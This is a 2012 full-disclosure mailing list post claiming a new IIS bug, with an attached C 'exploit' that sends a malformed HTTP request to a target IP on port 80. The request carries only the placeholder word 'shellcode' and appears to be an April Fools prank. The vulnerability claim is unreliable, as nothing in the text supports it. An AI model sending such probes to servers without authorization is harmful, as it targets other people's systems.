

FW: iis bug
From: yuange <yuange1975 () hotmail com>
Date: Sun, 1 Apr 2012 07:51:09 +0000



 the exp file.  /*  iisexp41.c  ver4.1 copy by @yuange1975 2012.4.1
  假作真时真亦假。  http://weibo.com/yuange1975
  http://twitter.com/yuange75
  http://hi.baidu.com/yuange1975/blog/item/ac368655017819dbb745aeee.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* memcpy, memset, strlen */
#include <errno.h>

#include <winsock2.h>   /* must be included before <windows.h> */
#include <windows.h>
#include <mswsock.h>
#include <wsnwlink.h>
#include <ws2tcpip.h>
#include <process.h>    /* _beginthread, _endthread */
#include <io.h>
#include <conio.h>

#pragma comment(lib,"ws2_32")
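#pragma comment(lib,"Mswsock")

/*
 * The request that do_exp() sends, byte for byte. It is deliberately not a
 * well-formed HTTP/1.1 message: the header block contains a bare '\n'
 * between "a=b" and "c:shellcode" where a CRLF is required. Nothing in this
 * file rewrites or inspects it; it is sent verbatim.
 */
char  *AprilFoolsDay ="GET /AprilFools'Day.php  HTTP/1.1\r\nHOST:weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n";

/*
 * Parse a dotted-quad IPv4 literal into network-byte-order form.
 *
 * Despite the name no DNS lookup is performed: only inet_addr() is used, so
 * a host name (or NULL) yields 0. INADDR_ANY is rejected as well, which makes
 * 0 an unambiguous "no usable address" return value for the caller.
 */
static unsigned int maybe_lookup_host(const char *name)
{
    if (name == NULL) {
        return 0;
    }

    unsigned long ulAddr = inet_addr(name);
    if (ulAddr == INADDR_NONE || ulAddr == INADDR_ANY) {
        return 0;
    }
    return (unsigned int)ulAddr;
}

/*
 * Open a TCP connection to hostname:port and send AprilFoolsDay once.
 *
 * hostname must be a literal IPv4 address (see maybe_lookup_host); port must
 * fit in 16 bits. Winsock must already be initialised by the caller
 * (main() does WSAStartup before calling this).
 *
 * Returns 0 when the whole request was written, -1 on any failure; the
 * failing step and its Winsock error code are printed. The socket is always
 * closed before returning.
 */
int do_exp(const char *hostname, unsigned int port)
{
    /* Validate the target before opening a socket we could not use. The
     * original code connected to whatever inet_addr() returned, which for
     * an unparsable name meant 0.0.0.0. */
    unsigned int addr = maybe_lookup_host(hostname);
    if (addr == 0) {
        printf_s("invalid target address: %s\n", hostname ? hostname : "(null)");
        return -1;
    }
    if (port > 65535u) {
        /* htons() would silently truncate the value. */
        printf_s("invalid port: %u\n", port);
        return -1;
    }

    SOCKET sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (sock == INVALID_SOCKET) {
        printf_s("WSASocket function failed with error = %d\n", WSAGetLastError());
        return -1;
    }

    int rc = -1;

    struct sockaddr_in sin;
    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_port   = htons((unsigned short)port);
    memcpy(&sin.sin_addr, &addr, sizeof sin.sin_addr);

    /* The socket is blocking, so connect() either succeeds or fails; there is
     * no WSAEWOULDBLOCK case to tolerate here. */
    if (connect(sock, (struct sockaddr *)&sin, sizeof sin) == SOCKET_ERROR) {
        printf_s("connect function failed with error: %d\n", WSAGetLastError());
        goto out_close;
    }
    printf("[*] connected to %s:%u\n", hostname, port);

    const char *crash_buf = AprilFoolsDay;
    size_t crash_buflen = strlen(AprilFoolsDay);

    int write_res = send(sock, crash_buf, (int)crash_buflen, 0);
    if (write_res == SOCKET_ERROR) {
        printf_s("send function failed with error: %d\n", WSAGetLastError());
        goto out_close;
    }
    printf("[*] send %d bytes\n", write_res);

    /* A short send is reported as a failure rather than treated as success. */
    if ((size_t)write_res != crash_buflen) {
        printf_s("[!] short send: %d of %u bytes\n", write_res, (unsigned)crash_buflen);
        goto out_close;
    }

    rc = 0;

out_close:
    closesocket(sock);
    return rc;
}

/*
 * Entry point: iisexp41 <target_ip>
 *
 * Initialises Winsock, sends the request to <target_ip>:80 via do_exp(), and
 * tears Winsock down again. Exit status is 0 on success, -1 when Winsock
 * could not be started or do_exp() failed; a missing argument prints usage
 * and exits 0 (unchanged from the original).
 */
int main(int argc, const char **argv)
{
    /* Check argc before reading argv[1]: argv[argc] is guaranteed NULL, but
     * argv[1] is out of bounds when argc == 0. */
    if (argc < 2 || argv[1] == NULL) {
        printf_s("usage: <target_ip>\n");
        return 0;
    }
    const char *target_ip = argv[1];

    /* Initialize Winsock */
    WSADATA wsaData;
    int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (iResult != 0) {
        printf_s("WSAStartup failed: %d\n", iResult);
        return -1;
    }

    int rc = do_exp(target_ip, 80);

    /* clean - win socket */
    WSACleanup();
    return rc;
}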
  From: yuange1975 () hotmail com
To: full-disclosure () lists grok org uk
Subject: iis bug
Date: Sun, 1 Apr 2012 03:30:29 +0000










iis new bug:
 
http://weibo.com/yuange1975
 
poc:
 
char  *AprilFoolsDay ="GET /AprilFools'Day.php  
HTTP/1.1\r\nHOST:http://weibo.com/yuange1975\r\na=b\nc:shellcode\r\n\r\n";; 

 
                                                                                  

Attachment: iisexp41.c
Description:

